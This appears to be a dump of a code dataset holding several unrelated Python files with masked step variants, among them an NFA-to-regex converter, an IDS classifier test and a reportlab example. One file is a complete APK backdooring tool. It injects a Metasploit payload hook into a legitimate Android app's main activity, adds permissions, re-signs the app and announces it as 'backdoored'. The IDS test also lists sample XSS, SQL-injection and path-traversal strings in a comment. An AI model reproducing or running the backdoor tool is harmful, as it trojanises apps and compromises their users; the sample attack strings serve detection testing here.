"step-5": "from util import AutomataError\nfrom automata import NFA\nfrom base import Node\nfrom copy import copy, deepcopy\nfrom os.path import commonprefix\n\nDEBUG = False\n\nLAMBDA = u'\\u03bb'\nPHI = u'\\u00d8'\n\n\ndef copyDeltas(src):\n out = dict()\n for k in src:\n out[k] = dict()\n for k2 in src[k]:\n out[k][k2] = copy(src[k][k2])\n\n return out\n\n\ndef replaceNode(nfa, old, new):\n if DEBUG:\n print('R_Start(%s, %s) ---' % (old, new), nfa)\n if old in nfa._deltas:\n for input in nfa._deltas[old]:\n nfa.addDelta(new, input, nfa._deltas[old][input])\n del nfa._deltas[old]\n if DEBUG:\n print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)\n\n deltas_temp = copyDeltas(nfa._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n if old in deltas_temp[src][input]:\n nfa._deltas[src][input].remove(old)\n nfa._deltas[src][input].add(new)\n if DEBUG:\n print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)\n\n\ndef commonsuffix(seq):\n def reverse(s):\n out = ''\n for c in reversed(s):\n out += c\n return out\n\n seq = [reverse(i) for i in seq]\n return reverse(commonprefix(seq))\n\n\nclass NetworkNFA(NFA):\n def __init__(self, nfa):\n if type(nfa) is not NFA:\n raise AutomataError('Can create a NetworkNFA only from an NFA.')\n\n if all([len(i) == 1 for i in nfa.charset]):\n self._charset = copy(nfa._charset)\n else:\n self._charset = set(['{%s}' % i for i in nfa._charset])\n\n self._nodes = copy(nfa._nodes)\n self._deltas = copyDeltas(nfa._deltas)\n self._start = nfa._start\n self._terminals = copy(nfa._terminals)\n\n def addDelta(self, node, input, dest):\n if set(input) - (self._charset.union(set('()+*'))):\n raise AutomataError('%s contains symbols not in charset.' % input)\n\n if type(node) is Node:\n if type(dest) is set and all([type(i) is Node for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][input].union(\n dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.' % type(dest).__name__)\n else:\n raise AutomataError(\n 'Delta source must be Node, not %s.' % type(node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - (self._charset.union(set('()+*'))):\n raise AutomataError('%s contains symbols not in charset.' % input)\n\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError(\n 'Delta source must be a Node, not %s' % type(node).__name__)\n\n def isValid(self):\n if len(self._nodes) == 0:\n return False\n if self._start not in self._nodes:\n return False\n\n for i in self._terminals:\n if i not in self._nodes:\n return False\n\n if not set(self._deltas.keys()).issubset(self._nodes):\n return False\n\n for key in self._deltas:\n for char in self._deltas[key]:\n if set(char) - (self._charset.union(set('()+*'))):\n return False\n\n return True\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n\n def __repr__(self):\n ret = '<NetworkNFA>\\n'\n ret += ' Charset: {%s}\\n' % ','.join(filter(None, self._charset))\n ret += ' Nodes: {%s}\\n' % ','.join([i.label for i in self._nodes])\n ret += 'Terminals: {%s}\\n' % ','.join(\n [i.label for i in self._terminals])\n ret += ' Start: %s\\n' % (self._start and self._start.label)\n ret += ' Delta: '\n if len(self._deltas):\n for qFrom in self._deltas:\n for input in self._deltas[qFrom]:\n ret += 'D(%s, %s) -> {%s}\\n ' % (qFrom.label, input or 'lambda', ','.join(\n [i.label for i in self._deltas[qFrom][input]]))\n ret = ret.rstrip() + '\\n'\n else:\n ret += 'None\\n'\n ret += ' Valid: %s\\n' % ('Yes' if self.isValid() else 'No')\n ret += '</NetworkNFA>'\n\n return ret\n\n\ndef nfa2regex(nfa):\n if not nfa.isValid():\n raise AutomataError(\n 'NFA must be in a valid state to be converted to a regex.')\n\n network = NetworkNFA(nfa)\n\n if DEBUG:\n print('START', network)\n\n# Take care of multi-terminals\n# if len(network.terminals) > 1:\n## end = Node('qf')\n# network.addNode(end)\n# for i in copy(network.terminals):\n## network.addDelta(i, '', end)\n# network.remTerminal(i)\n# network.addTerminal(end)\n\n # Add a dummy start and end nodes\n start = Node('qs')\n network.addNode(start)\n network.addDelta(start, '', network.start)\n network.start = start\n\n end = Node('qf')\n network.addNode(end)\n for i in network.terminals:\n network.addDelta(i, '', end)\n network.remTerminal(i)\n network.addTerminal(end)\n if DEBUG:\n print('Dummies added: ', network)\n\n # Collapse connections\n for src in network.nodes:\n delta_temp = network.getDelta(src)\n for dest in network.nodes:\n chars = []\n for input in delta_temp:\n if input and dest in delta_temp[input]:\n chars.append(input)\n\n if len(chars):\n for c in chars:\n delta_temp[c].remove(dest)\n if len(delta_temp[c]) == 0:\n del delta_temp[c]\n\n if len(chars) > 1:\n chars = '(' + '+'.join(chars) + ')'\n else:\n chars = '+'.join(chars)\n network.addDelta(src, chars, dest)\n if DEBUG:\n print('Collapsed: ', network)\n\n # Collect pliable nodes\n pliableNodes = list(network.nodes)\n pliableNodes.remove(network.start)\n for n in network.terminals:\n pliableNodes.remove(n)\n\n # Build a distance-from-terminal table\n nodeFinalDist = {}\n maxDist = len(network.nodes) ** len(network.nodes) # Lazy\n for n in network.nodes:\n nodeFinalDist[n] = maxDist\n\n nodeFinalDist[network.terminals[0]] = 0\n toProcess = list(network.nodes)\n toProcess.remove(network.terminals[0])\n\n while len(toProcess):\n for node in toProcess:\n dests = network.getDelta(node).values()\n if len(dests) == 0:\n dests = set([])\n else:\n dests = reduce(set.union, network.getDelta(node).values())\n\n if len(dests) == 0:\n toProcess.remove(node)\n else:\n minDist = min([nodeFinalDist[i] for i in dests])\n if minDist != maxDist:\n nodeFinalDist[node] = minDist + 1\n toProcess.remove(node)\n\n # Sort pliable nodes by distance from terminal\n pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)\n if DEBUG:\n print('Pliables: ', pliableNodes)\n\n for node in pliableNodes:\n # Remove Node\n network.remNode(node)\n\n # Save delta\n delta = copy(network.getDelta(node))\n\n # Convert loops to regex\n loops = []\n for input in delta:\n if node in delta[input]:\n if len(input):\n loops.append(input)\n loopRegex = '+'.join(loops)\n if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1] == ')'):\n loopRegex = '(' + loopRegex + ')*'\n elif len(loopRegex) >= 1:\n loopRegex = loopRegex + '*'\n\n # Remove loops\n for input in copy(delta):\n if delta[input] == set([node]):\n del delta[input]\n elif node in delta[input]:\n delta[input].remove(node)\n\n # Search lambda-closure equivalence\n if '' in delta and (len(delta) != 1 or len(delta['']) != 1):\n eligible = []\n for dest in delta['']:\n delta_temp = network.getDelta(dest)\n if '' in delta_temp and node in delta_temp['']:\n eligible.append(dest)\n\n if len(eligible):\n replaceNode(network, node, eligible[0])\n continue\n\n # Remove delta\n try:\n del network._deltas[node]\n except KeyError: # No deltas remaining, had only loops\n continue\n\n if DEBUG:\n print('Working on connections: ', node, delta)\n # Check all possible connections through this node\n deltas_temp = copyDeltas(network._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n tempDeltaDest = network.getDelta(src)[input]\n if node in tempDeltaDest:\n tempDeltaDest.remove(node)\n if len(tempDeltaDest) == 0:\n network.remDelta(src, input)\n\n for input2 in delta:\n for dest in delta[input2]:\n if not (src == dest and (input + loopRegex + input2) == ''):\n network.addDelta(\n src, input + loopRegex + input2, dest)\n if DEBUG:\n print('New Delta:', src, input,\n loopRegex, input2, dest, network)\n\n # Extract common prefix/suffix\n branches = network.getDelta(network.start).keys()\n if len(branches) == 1:\n regex = branches[0]\n else:\n prefix = commonprefix(branches)\n suffix = commonsuffix(branches)\n branches = [i[len(prefix):-len(suffix)] if len(suffix) else i[len(prefix):]\n for i in branches]\n branches.sort(key=len)\n if len(prefix) or len(suffix):\n regex = prefix + \\\n '(' + '+'.join([i or LAMBDA for i in branches]) + ')' + suffix\n else:\n regex = '+'.join([i or LAMBDA for i in branches]) or PHI\n\n return regex\n",
"step-ids": [
8,
9,
11,
13,
14
]
}
|
[
8,
9,
11,
13,
14
] |
def solution(record):
answer = []
arr = dict()
history = []
for i in record:
tmp = i.split()
if tmp[0] == "Enter" :
arr[tmp[1]] = tmp[2]
history.append([tmp[1], "님이 들어왔습니다."])
elif tmp[0] == "Leave" :
history.append([tmp[1], "님이 나갔습니다."])
elif tmp[0] == "Change" :
arr[tmp[1]] = tmp[2]
for i in history :
answer.append(arr[i[0]] + i[1])
return answer
|
normal
|
{
"blob_id": "d9f66cc3ba40292c49da08d7573d4c605a2771ae",
"index": 3730,
"step-1": "<mask token>\n",
"step-2": "def solution(record):\n answer = []\n arr = dict()\n history = []\n for i in record:\n tmp = i.split()\n if tmp[0] == 'Enter':\n arr[tmp[1]] = tmp[2]\n history.append([tmp[1], '님이 들어왔습니다.'])\n elif tmp[0] == 'Leave':\n history.append([tmp[1], '님이 나갔습니다.'])\n elif tmp[0] == 'Change':\n arr[tmp[1]] = tmp[2]\n for i in history:\n answer.append(arr[i[0]] + i[1])\n return answer\n",
"step-3": "def solution(record):\n answer = []\n arr = dict()\n history = []\n for i in record:\n tmp = i.split()\n if tmp[0] == \"Enter\" :\n arr[tmp[1]] = tmp[2]\n history.append([tmp[1], \"님이 들어왔습니다.\"])\n elif tmp[0] == \"Leave\" :\n history.append([tmp[1], \"님이 나갔습니다.\"])\n elif tmp[0] == \"Change\" :\n arr[tmp[1]] = tmp[2]\n\n for i in history :\n answer.append(arr[i[0]] + i[1])\n return answer",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open(good_testfile, 'r') as f:
print('预测数据集: ' + good_testfile)
preicdtlist = [i.strip('\n') for i in f.readlines()[:]]
result = a.predict(preicdtlist)
print('恶意结果 前10条' + str(result[1][:10]))
print('正常结果 前10条 ' + str(result[0][:10]))
pass
with open(bad_testfile, 'r') as f:
print('预测数据集: ' + bad_testfile)
preicdtlist = [i.strip('\n') for i in f.readlines()[:]]
result = a.predict(preicdtlist)
print('恶意结果 前10条' + str(result[1][:10]))
print('正常结果 前10条 ' + str(result[0][:10]))
pass
<|reserved_special_token_1|>
<|reserved_special_token_0|>
good_testfile = 'data/good_fromE2.txt'
bad_testfile = 'data/badqueries.txt'
a = IDS.SVM()
with open(good_testfile, 'r') as f:
print('预测数据集: ' + good_testfile)
preicdtlist = [i.strip('\n') for i in f.readlines()[:]]
result = a.predict(preicdtlist)
print('恶意结果 前10条' + str(result[1][:10]))
print('正常结果 前10条 ' + str(result[0][:10]))
pass
with open(bad_testfile, 'r') as f:
print('预测数据集: ' + bad_testfile)
preicdtlist = [i.strip('\n') for i in f.readlines()[:]]
result = a.predict(preicdtlist)
print('恶意结果 前10条' + str(result[1][:10]))
print('正常结果 前10条 ' + str(result[0][:10]))
pass
<|reserved_special_token_1|>
import IDS
good_testfile = 'data/good_fromE2.txt'
bad_testfile = 'data/badqueries.txt'
a = IDS.SVM()
with open(good_testfile, 'r') as f:
print('预测数据集: ' + good_testfile)
preicdtlist = [i.strip('\n') for i in f.readlines()[:]]
result = a.predict(preicdtlist)
print('恶意结果 前10条' + str(result[1][:10]))
print('正常结果 前10条 ' + str(result[0][:10]))
pass
with open(bad_testfile, 'r') as f:
print('预测数据集: ' + bad_testfile)
preicdtlist = [i.strip('\n') for i in f.readlines()[:]]
result = a.predict(preicdtlist)
print('恶意结果 前10条' + str(result[1][:10]))
print('正常结果 前10条 ' + str(result[0][:10]))
pass
<|reserved_special_token_1|>
import IDS
# In[7]:
# testfile = 'data/good_fromE2.txt'
# testfile = 'data/goodqueries.txt'
good_testfile = "data/good_fromE2.txt"
bad_testfile = "data/badqueries.txt"
# a = IDS.LG()
a = IDS.SVM()
# preicdtlist = ['www.foo.com/id=1<script>alert(1)</script>','www.foo.com/name=admin\' or 1=1','abc.com/admin.php','"><svg onload=confirm(1)>','test/q=<a href="javascript:confirm(1)>','q=../etc/passwd']
# result =a.predict(preicdtlist)
# print('正常结果 前10条 ' + str(result[0][:10]))
with open(good_testfile, 'r') as f:
print('预测数据集: '+good_testfile)
preicdtlist = [i.strip('\n') for i in f.readlines()[:]]
result = a.predict(preicdtlist)
print('恶意结果 前10条'+str(result[1][:10]))
print('正常结果 前10条 ' + str(result[0][:10]))
pass
with open(bad_testfile, 'r') as f:
print('预测数据集: '+bad_testfile)
preicdtlist = [i.strip('\n') for i in f.readlines()[:]]
result = a.predict(preicdtlist)
print('恶意结果 前10条'+str(result[1][:10]))
print('正常结果 前10条 ' + str(result[0][:10]))
pass
|
flexible
|
{
"blob_id": "e627bcc6c9a49d46190cc793a77103aa0a760989",
"index": 1709,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open(good_testfile, 'r') as f:\n print('预测数据集: ' + good_testfile)\n preicdtlist = [i.strip('\\n') for i in f.readlines()[:]]\n result = a.predict(preicdtlist)\n print('恶意结果 前10条' + str(result[1][:10]))\n print('正常结果 前10条 ' + str(result[0][:10]))\n pass\nwith open(bad_testfile, 'r') as f:\n print('预测数据集: ' + bad_testfile)\n preicdtlist = [i.strip('\\n') for i in f.readlines()[:]]\n result = a.predict(preicdtlist)\n print('恶意结果 前10条' + str(result[1][:10]))\n print('正常结果 前10条 ' + str(result[0][:10]))\n pass\n",
"step-3": "<mask token>\ngood_testfile = 'data/good_fromE2.txt'\nbad_testfile = 'data/badqueries.txt'\na = IDS.SVM()\nwith open(good_testfile, 'r') as f:\n print('预测数据集: ' + good_testfile)\n preicdtlist = [i.strip('\\n') for i in f.readlines()[:]]\n result = a.predict(preicdtlist)\n print('恶意结果 前10条' + str(result[1][:10]))\n print('正常结果 前10条 ' + str(result[0][:10]))\n pass\nwith open(bad_testfile, 'r') as f:\n print('预测数据集: ' + bad_testfile)\n preicdtlist = [i.strip('\\n') for i in f.readlines()[:]]\n result = a.predict(preicdtlist)\n print('恶意结果 前10条' + str(result[1][:10]))\n print('正常结果 前10条 ' + str(result[0][:10]))\n pass\n",
"step-4": "import IDS\ngood_testfile = 'data/good_fromE2.txt'\nbad_testfile = 'data/badqueries.txt'\na = IDS.SVM()\nwith open(good_testfile, 'r') as f:\n print('预测数据集: ' + good_testfile)\n preicdtlist = [i.strip('\\n') for i in f.readlines()[:]]\n result = a.predict(preicdtlist)\n print('恶意结果 前10条' + str(result[1][:10]))\n print('正常结果 前10条 ' + str(result[0][:10]))\n pass\nwith open(bad_testfile, 'r') as f:\n print('预测数据集: ' + bad_testfile)\n preicdtlist = [i.strip('\\n') for i in f.readlines()[:]]\n result = a.predict(preicdtlist)\n print('恶意结果 前10条' + str(result[1][:10]))\n print('正常结果 前10条 ' + str(result[0][:10]))\n pass\n",
"step-5": "\nimport IDS\n# In[7]:\n# testfile = 'data/good_fromE2.txt'\n# testfile = 'data/goodqueries.txt'\ngood_testfile = \"data/good_fromE2.txt\"\nbad_testfile = \"data/badqueries.txt\"\n# a = IDS.LG()\n\na = IDS.SVM()\n\n# preicdtlist = ['www.foo.com/id=1<script>alert(1)</script>','www.foo.com/name=admin\\' or 1=1','abc.com/admin.php','\"><svg onload=confirm(1)>','test/q=<a href=\"javascript:confirm(1)>','q=../etc/passwd']\n# result =a.predict(preicdtlist)\n# print('正常结果 前10条 ' + str(result[0][:10]))\n\n\n\nwith open(good_testfile, 'r') as f:\n print('预测数据集: '+good_testfile)\n preicdtlist = [i.strip('\\n') for i in f.readlines()[:]]\n result = a.predict(preicdtlist)\n print('恶意结果 前10条'+str(result[1][:10]))\n print('正常结果 前10条 ' + str(result[0][:10]))\n pass\n\n\nwith open(bad_testfile, 'r') as f:\n print('预测数据集: '+bad_testfile)\n preicdtlist = [i.strip('\\n') for i in f.readlines()[:]]\n result = a.predict(preicdtlist)\n print('恶意结果 前10条'+str(result[1][:10]))\n print('正常结果 前10条 ' + str(result[0][:10]))\n pass",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def paragraph_spacing():
doc = SimpleDocTemplate('paragraph_spacing.pdf', pagesize=letter)
styles = getSampleStyleSheet()
styles['Normal'].spaceBefore = 10
styles['Normal'].spaceAfter = 10
flowables = []
text = """
This <b>text</b> is important,
not <strong>strong</strong>.
"""
para = Paragraph(text, style=styles['Normal'])
flowables.append(para)
text = """
This <b>text</b> is important,
not <strong>strong</strong>.
"""
para = Paragraph(text, style=styles['Normal'])
flowables.append(para)
doc.build(flowables)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def paragraph_spacing():
doc = SimpleDocTemplate('paragraph_spacing.pdf', pagesize=letter)
styles = getSampleStyleSheet()
styles['Normal'].spaceBefore = 10
styles['Normal'].spaceAfter = 10
flowables = []
text = """
This <b>text</b> is important,
not <strong>strong</strong>.
"""
para = Paragraph(text, style=styles['Normal'])
flowables.append(para)
text = """
This <b>text</b> is important,
not <strong>strong</strong>.
"""
para = Paragraph(text, style=styles['Normal'])
flowables.append(para)
doc.build(flowables)
if __name__ == '__main__':
paragraph_spacing()
<|reserved_special_token_1|>
from reportlab.lib.pagesizes import letter
from reportlab.platypus import SimpleDocTemplate, Paragraph
from reportlab.lib.styles import getSampleStyleSheet
def paragraph_spacing():
doc = SimpleDocTemplate('paragraph_spacing.pdf', pagesize=letter)
styles = getSampleStyleSheet()
styles['Normal'].spaceBefore = 10
styles['Normal'].spaceAfter = 10
flowables = []
text = """
This <b>text</b> is important,
not <strong>strong</strong>.
"""
para = Paragraph(text, style=styles['Normal'])
flowables.append(para)
text = """
This <b>text</b> is important,
not <strong>strong</strong>.
"""
para = Paragraph(text, style=styles['Normal'])
flowables.append(para)
doc.build(flowables)
if __name__ == '__main__':
paragraph_spacing()
<|reserved_special_token_1|>
from reportlab.lib.pagesizes import letter
from reportlab.platypus import SimpleDocTemplate, Paragraph
from reportlab.lib.styles import getSampleStyleSheet
def paragraph_spacing():
doc = SimpleDocTemplate("paragraph_spacing.pdf", pagesize=letter)
styles = getSampleStyleSheet()
#Mengahasilkan spasi antar paragraf sehinga tidak diperlukan <br/>
styles["Normal"].spaceBefore = 10
styles["Normal"].spaceAfter = 10
flowables = []
text = """
This <b>text</b> is important,
not <strong>strong</strong>.
"""
para = Paragraph(text, style=styles["Normal"])
flowables.append(para)
text = """
This <b>text</b> is important,
not <strong>strong</strong>.
"""
para = Paragraph(text, style=styles["Normal"])
flowables.append(para)
doc.build(flowables)
if __name__ == "__main__":
paragraph_spacing()
|
flexible
|
{
"blob_id": "d79e65b7aa09066230dec1a472f4535dff4123b5",
"index": 4217,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef paragraph_spacing():\n doc = SimpleDocTemplate('paragraph_spacing.pdf', pagesize=letter)\n styles = getSampleStyleSheet()\n styles['Normal'].spaceBefore = 10\n styles['Normal'].spaceAfter = 10\n flowables = []\n text = \"\"\"\n This <b>text</b> is important,\n not <strong>strong</strong>.\n \"\"\"\n para = Paragraph(text, style=styles['Normal'])\n flowables.append(para)\n text = \"\"\"\n This <b>text</b> is important,\n not <strong>strong</strong>.\n \"\"\"\n para = Paragraph(text, style=styles['Normal'])\n flowables.append(para)\n doc.build(flowables)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef paragraph_spacing():\n doc = SimpleDocTemplate('paragraph_spacing.pdf', pagesize=letter)\n styles = getSampleStyleSheet()\n styles['Normal'].spaceBefore = 10\n styles['Normal'].spaceAfter = 10\n flowables = []\n text = \"\"\"\n This <b>text</b> is important,\n not <strong>strong</strong>.\n \"\"\"\n para = Paragraph(text, style=styles['Normal'])\n flowables.append(para)\n text = \"\"\"\n This <b>text</b> is important,\n not <strong>strong</strong>.\n \"\"\"\n para = Paragraph(text, style=styles['Normal'])\n flowables.append(para)\n doc.build(flowables)\n\n\nif __name__ == '__main__':\n paragraph_spacing()\n",
"step-4": "from reportlab.lib.pagesizes import letter\nfrom reportlab.platypus import SimpleDocTemplate, Paragraph\nfrom reportlab.lib.styles import getSampleStyleSheet\n\n\ndef paragraph_spacing():\n doc = SimpleDocTemplate('paragraph_spacing.pdf', pagesize=letter)\n styles = getSampleStyleSheet()\n styles['Normal'].spaceBefore = 10\n styles['Normal'].spaceAfter = 10\n flowables = []\n text = \"\"\"\n This <b>text</b> is important,\n not <strong>strong</strong>.\n \"\"\"\n para = Paragraph(text, style=styles['Normal'])\n flowables.append(para)\n text = \"\"\"\n This <b>text</b> is important,\n not <strong>strong</strong>.\n \"\"\"\n para = Paragraph(text, style=styles['Normal'])\n flowables.append(para)\n doc.build(flowables)\n\n\nif __name__ == '__main__':\n paragraph_spacing()\n",
"step-5": "from reportlab.lib.pagesizes import letter\nfrom reportlab.platypus import SimpleDocTemplate, Paragraph\nfrom reportlab.lib.styles import getSampleStyleSheet\n\n\ndef paragraph_spacing():\n doc = SimpleDocTemplate(\"paragraph_spacing.pdf\", pagesize=letter)\n\n styles = getSampleStyleSheet()\n #Mengahasilkan spasi antar paragraf sehinga tidak diperlukan <br/>\n styles[\"Normal\"].spaceBefore = 10\n styles[\"Normal\"].spaceAfter = 10\n\n flowables = []\n\n text = \"\"\"\n This <b>text</b> is important,\n not <strong>strong</strong>.\n \"\"\"\n para = Paragraph(text, style=styles[\"Normal\"])\n flowables.append(para)\n\n text = \"\"\"\n This <b>text</b> is important,\n not <strong>strong</strong>.\n \"\"\"\n para = Paragraph(text, style=styles[\"Normal\"])\n flowables.append(para)\n\n doc.build(flowables)\n\n\nif __name__ == \"__main__\":\n paragraph_spacing()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python
import os
import re
import pycolor
import sys
pyc = pycolor.pyColor()
def decompile(mainapk):
print pyc.Info("Decompiling apks...")
os.system("bash apktool.sh d -f %s"%mainapk)
os.system("bash apktool.sh d -f temp.apk")
def inject(mainapk):
print pyc.Info("Injecting payload...")
mk = "mkdir %s/smali/com/metasploit"%mainapk.split('.')[0]
os.system(mk)
mk = "mkdir %s/smali/com/metasploit/stage"%mainapk.split('.')[0]
os.system(mk)
cp = "cp temp/smali/com/metasploit/stage/Payload* %s/smali/com/metasploit/stage/"%mainapk.split('.')[0]
os.system(cp)
filemanifest = "%s/AndroidManifest.xml"%mainapk.split('.')[0]
fhandle = open(filemanifest,'r')
fread = fhandle.read()
fhandle.close()
fread = fread.split('<action android:name="android.intent.action.MAIN"/>')[0].split('<activity android:')[1]
acn = re.search('android:name=\"[\w.]+',fread)
activityname = acn.group(0).split('"')[1]
acpath = activityname.replace('.','/') + ".smali"
smalipath = "%s/smali/%s"%(mainapk.split('.')[0], acpath)
fhandle = open(smalipath,'r')
fread = fhandle.read()
fhandle.close()
print pyc.Info("Injecting hooks in %s..."%activityname)
fhalf = fread.split(";->onCreate(Landroid/os/Bundle;)V")[0]
shalf = fread.split(";->onCreate(Landroid/os/Bundle;)V")[1]
injection = ";->onCreate(Landroid/os/Bundle;)V\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V"
total = fhalf + injection + shalf
fhandle = open(smalipath,'w')
fhandle.write(total)
fhandle.close()
print pyc.Succ("Hook injected -> metasploit/stage/Payload")
def permissions(mainapk):
print pyc.Info("Adding permissions...")
filemanifest = "temp/AndroidManifest.xml"
fhandle = open(filemanifest,'r')
fread = fhandle.readlines()
prmns = []
for line in fread:
if('<uses-permission' in line):
prmns.append(line.replace('\n',''))
fhandle.close()
filemanifest = "%s/AndroidManifest.xml"%mainapk.split('.')[0]
fhandle = open(filemanifest,'r')
fread = fhandle.readlines()
half=[]
for line in fread:
if('<uses-permission' in line):
prmns.append(line.replace('\n',''))
else:
half.append(line)
prmns = set(prmns)
fhandle.close()
fhandle = open(filemanifest,'w')
for i in half:
if half.index(i)==2:
for j in prmns:
fhandle.write(j+"\n")
else:
fhandle.write(i)
for i in prmns:
print '\t',i.split('android:name="')[1].split('"')[0]
print pyc.Succ("%d Permissions added."%(len(prmns)))
def rebuild(mainapk):
print pyc.Info("Recompiling...")
rebuild = "bash apktool.sh b -f %s"%mainapk.split('.')[0]
os.system(rebuild)
print pyc.Info("Signing apk...")
path = "%s/dist/%s"%(mainapk.split('.')[0],mainapk)
signapk = "java -jar signapk.jar cert.x509.pem privatekey.pk8 %s %s-final.apk"%(path,mainapk[:-4])
os.system(signapk)
print pyc.Succ("Successfully backdoored and saved as %s-final.apk"%mainapk[:-4])
|
normal
|
{
"blob_id": "fcc73647a5e841bcb5ea4fcd06579cc6912cfe1e",
"index": 435,
"step-1": "#!/usr/bin/env python\n\nimport os\nimport re\nimport pycolor\nimport sys\n\npyc = pycolor.pyColor()\n\ndef decompile(mainapk):\n\tprint pyc.Info(\"Decompiling apks...\")\n\tos.system(\"bash apktool.sh d -f %s\"%mainapk)\n\tos.system(\"bash apktool.sh d -f temp.apk\")\n\ndef inject(mainapk):\n\tprint pyc.Info(\"Injecting payload...\")\n\tmk = \"mkdir %s/smali/com/metasploit\"%mainapk.split('.')[0]\n\tos.system(mk)\n\tmk = \"mkdir %s/smali/com/metasploit/stage\"%mainapk.split('.')[0]\n\tos.system(mk)\n\tcp = \"cp temp/smali/com/metasploit/stage/Payload* %s/smali/com/metasploit/stage/\"%mainapk.split('.')[0]\n\tos.system(cp)\n\tfilemanifest = \"%s/AndroidManifest.xml\"%mainapk.split('.')[0]\n\tfhandle = open(filemanifest,'r')\n\tfread = fhandle.read()\n\tfhandle.close()\n\tfread = fread.split('<action android:name=\"android.intent.action.MAIN\"/>')[0].split('<activity android:')[1]\n\tacn = re.search('android:name=\\\"[\\w.]+',fread)\n\tactivityname = acn.group(0).split('\"')[1]\n\tacpath = activityname.replace('.','/') + \".smali\"\n\tsmalipath = \"%s/smali/%s\"%(mainapk.split('.')[0], acpath)\n\tfhandle = open(smalipath,'r')\n\tfread = fhandle.read()\n\tfhandle.close()\n\tprint pyc.Info(\"Injecting hooks in %s...\"%activityname)\n\tfhalf = fread.split(\";->onCreate(Landroid/os/Bundle;)V\")[0]\n\tshalf = fread.split(\";->onCreate(Landroid/os/Bundle;)V\")[1]\n\tinjection = \";->onCreate(Landroid/os/Bundle;)V\\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V\"\n\ttotal = fhalf + injection + shalf\n\tfhandle = open(smalipath,'w')\n\tfhandle.write(total)\n\tfhandle.close()\n\tprint pyc.Succ(\"Hook injected -> metasploit/stage/Payload\")\n\ndef permissions(mainapk):\n\tprint pyc.Info(\"Adding permissions...\")\n\tfilemanifest = \"temp/AndroidManifest.xml\"\n\tfhandle = open(filemanifest,'r')\n\tfread = fhandle.readlines()\n\tprmns = []\n\tfor line in fread:\n\t\tif('<uses-permission' in line):\n\t\t\tprmns.append(line.replace('\\n',''))\t\n\tfhandle.close()\n\tfilemanifest = \"%s/AndroidManifest.xml\"%mainapk.split('.')[0]\n\tfhandle = open(filemanifest,'r')\n\tfread = fhandle.readlines()\n\thalf=[]\n\tfor line in fread:\n\t\tif('<uses-permission' in line):\n\t\t\tprmns.append(line.replace('\\n',''))\n\t\telse:\n\t\t\thalf.append(line)\n\tprmns = set(prmns)\n\tfhandle.close()\n\t\n\tfhandle = open(filemanifest,'w')\n\tfor i in half:\n\t\tif half.index(i)==2:\n\t\t\tfor j in prmns:\n\t\t\t\tfhandle.write(j+\"\\n\")\n\t\telse:\n\t\t\tfhandle.write(i)\n\tfor i in prmns:\n\t\tprint '\\t',i.split('android:name=\"')[1].split('\"')[0]\n\tprint pyc.Succ(\"%d Permissions added.\"%(len(prmns)))\n\t\ndef rebuild(mainapk):\n\tprint pyc.Info(\"Recompiling...\")\n\trebuild = \"bash apktool.sh b -f %s\"%mainapk.split('.')[0]\t\n\tos.system(rebuild)\n\tprint pyc.Info(\"Signing apk...\")\n\tpath = \"%s/dist/%s\"%(mainapk.split('.')[0],mainapk)\n\tsignapk = \"java -jar signapk.jar cert.x509.pem privatekey.pk8 %s %s-final.apk\"%(path,mainapk[:-4])\n\tos.system(signapk)\n\tprint pyc.Succ(\"Successfully backdoored and saved as %s-final.apk\"%mainapk[:-4])\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
parser = argparse.ArgumentParser(prog='update_test_files.py')
parser.add_argument('--tests', dest='tests_dir', required=True, help=
'The path to the existing RSMTool tests directory')
parser.add_argument('--outputs', dest='outputs_dir', required=True,
help=
'The path to the directory containing the updated test outputs (usually `test_outputs`)'
)
args = parser.parse_args()
run_test_suite = input('Have you already run the whole test suite? (y/n): '
)
if run_test_suite == 'n':
print(
'Please run the whole test suite using `nose2 -s tests` before running this script.'
)
sys.exit(0)
elif run_test_suite != 'y':
print('Invalid answer. Exiting.')
sys.exit(1)
else:
print()
suffixes = [re.sub('test_experiment_', '', p.stem) for p in Path(
'tests').glob('test_experiment_*.py')]
updater = FileUpdater(test_suffixes=suffixes, tests_directory=args.
tests_dir, updated_outputs_directory=args.outputs_dir)
updater.run()
updater.print_report()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
parser = argparse.ArgumentParser(prog='update_test_files.py')
parser.add_argument('--tests', dest='tests_dir', required=True, help=
